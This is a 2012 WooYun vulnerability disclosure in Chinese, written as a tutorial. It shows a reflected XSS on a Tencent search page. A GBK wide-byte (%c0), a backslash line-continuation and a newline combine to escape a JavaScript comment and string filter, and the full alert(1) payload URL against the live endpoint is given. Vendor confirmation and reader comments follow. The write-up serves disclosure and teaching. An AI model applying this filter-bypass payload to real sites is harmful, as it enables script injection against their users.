漏洞概要 关注数(47) 关注此漏洞

缺陷编号: WooYun-2012-16008

漏洞标题: [腾讯实例教程] 那些年我们一起学XSS - 7. 宽字节、反斜线与换行符一起复仇记

相关厂商: 腾讯

漏洞作者: 心伤的瘦子

提交时间: 2012-12-14 13:06

公开时间: 2013-01-28 13:07

漏洞类型: xss跨站脚本攻击

危害等级: 低

自评Rank: 1

漏洞状态: 厂商已经确认

Tags标签: 反射型xss xss利用技巧

7人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-14: 细节已通知厂商并且等待厂商处理中
2012-12-17: 厂商已经确认,细节仅向厂商公开
2012-12-27: 细节向核心白帽子及相关领域专家公开
2013-01-06: 细节向普通白帽子公开
2013-01-16: 细节向实习白帽子公开
2013-01-28: 细节向公众公开

简要描述:

这一次,3个家伙一起上啦~

详细说明:

1. 实例点如下:



http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaaaaaaaaaa





老规矩,继续看我们的输出。







2. 一共有3处输出,位于HTML属性里的那一处,我们放弃了,因为双引号被灭掉了。那么还剩下2处。 都是位于<script>..</script>里,而且挨在了一起。



3. 先看第2处,是不是似曾相似啊? 对的,教程6里刚刚遇到过。那就是输出在【注释】的情况。我们用换行符试试?







4. 一条是好消息,换行可以用,一条是坏消息。。下面出现的一句坏了我们的好事。。肿么办。



5. 这个时候,我们需要先说点javascript的知识。



javascript,字符串允许下面多行的写法。



var  a="我是一个字符串\
我还是一个字符串";

alert(a);





6. 基于这点,我们可以把缺陷点构造成下面的样子。



//document.getElementById("order_select").value = "aaaa\
alert(1);//";

var searchOrder = "aaaa\
alert(1);//";





那么代码构造的解析如下:



picture\10_29.jpg





7.带着这个想法,请上我们的反斜线。。



picture\13_30.jpg





8. 悲剧的是,反斜线被过滤成了2个\\,这下不好办了。



9. 还记得在教程4里,我们提到的宽字节用法么?说到了 %c0可以吃掉%5c。



我们看看页面的编码。



<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />





gbxxx系列的啊,窃喜中。



10. 于是,我们的%c0也加入战斗了。



http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaa%c0%5c%0aalert(1);//





看看源码中的输出。 \\ 被我们变成了 乱码+\



picture\16_31.jpg





11. 最后弹窗,见漏洞证明~~



12. 此时,标点符号们正在开会,开会的主题是:“大家好,才是真的好”

漏洞证明:

picture\19_32.jpg

修复方案:

参加前面教程4,5,6

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-17 15:07

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评论

  1. 2012-12-14 13:11 | zsx ( 实习白帽子 | Rank:0 漏洞数:3 | undefined)
    0

    刷新一下就看到7了= =

  2. 2012-12-14 13:19 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @zsx 多谢关注

  3. 2012-12-14 13:37 | 猥琐 ( 实习白帽子 | Rank:6 漏洞数:2 | 学习什么的最重要!)
    1

    上课!

  4. 2012-12-14 13:46 | D&G ( 实习白帽子 | Rank:28 漏洞数:6 | linux 爱好者。低调球发展)
    0

    报道

  5. 2012-12-14 14:17 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    @心伤的瘦子 咱来个剧透呗?打算连载到几呢?

  6. 2012-12-14 14:25 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @鬼魅羊羔 10 - 20之间吧, 能不能20+,看后面能不能找的到实例了。

  7. 2012-12-14 15:09 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    @心伤的瘦子 好多。。记得写详细点哈。。

  8. 2012-12-14 15:25 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 | 我爱lmstz)
    0

    昨天晚上到5,今天早上6,下午7....膜拜ing

  9. 2012-12-14 16:08 | 蓝风 ( 普通白帽子 | Rank:123 漏洞数:23 | ‮#知我者謂我心憂 不知我者謂我何求#)
    0

    友情提示:@心伤的胖子系列连载已全部开放,请自备洛阳铲开挖吧!

  10. 2012-12-14 16:32 | only_guest (核心白帽子 | Rank:737 漏洞数:71 | PKAV技术宅社区-专心做技术.)
    0

    在360的安全大会上.冒着被嗅探的风险上来发一帖....加油...连载到368集

  11. 2012-12-14 17:32 | 蓝风 ( 普通白帽子 | Rank:123 漏洞数:23 | ‮#知我者謂我心憂 不知我者謂我何求#)
    0

    @only_guest 膜拜啊!这种精神值得啃顶

  12. 2012-12-14 17:40 | 一刀终情 ( 普通白帽子 | Rank:138 漏洞数:25 | ‮‮PKAV技术宅社区-安全爱好者)
    0

    @心伤的瘦子 不限腾讯嘛,教程重要~

  13. 2012-12-14 18:31 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 嘿,我崇拜你们来了)
    0

    @一刀终情 普通站点的,往往没什么过滤,没过滤,教程就没法写。总不能教大家直接复制粘贴,回车+弹窗哈。 而腾讯往往有过滤,有攻有守才好看。

  14. 2012-12-14 19:50 | 鬼魅羊羔 ( 普通白帽子 | Rank:164 漏洞数:25 | 不许动!我是警察!)
    0

    @心伤的瘦子 你已经很乌云了。。

  15. 2012-12-16 12:46 | 一刀终情 ( 普通白帽子 | Rank:138 漏洞数:25 | ‮‮PKAV技术宅社区-安全爱好者)
    0

    @心伤的瘦子 还可以新浪微博系列嘛~~

  16. 2012-12-17 18:58 | rasca1 ( 实习白帽子 | Rank:14 漏洞数:3 | 菜鸟一只)
    0

    @心伤的瘦子 膜拜

  17. 2013-01-06 15:25 | Adra1n ( 普通白帽子 | Rank:214 漏洞数:30 | 学习求教无线、手机方面的安全知识。。。)
    0

    @心伤的瘦子 膜拜

  18. 2013-01-19 16:28 | DragonEgg ( 实习白帽子 | Rank:56 漏洞数:8 | 冷漠无情的绅士,温柔善良的坏蛋。)
    0
  19. 2013-01-28 13:57 | unxss ( 实习白帽子 | Rank:12 漏洞数:4 )
    0

    很精彩。

  20. 2013-02-06 14:43 | Stream ( 实习白帽子 | Rank:5 漏洞数:1 | 低头要有勇气,抬头要有底气!)
    0

    屌爆了

  21. 2013-02-16 18:43 | mole3o ( 实习白帽子 | Rank:10 漏洞数:2 | 学生一枚,青春向上的白帽子。)
    0

    精彩!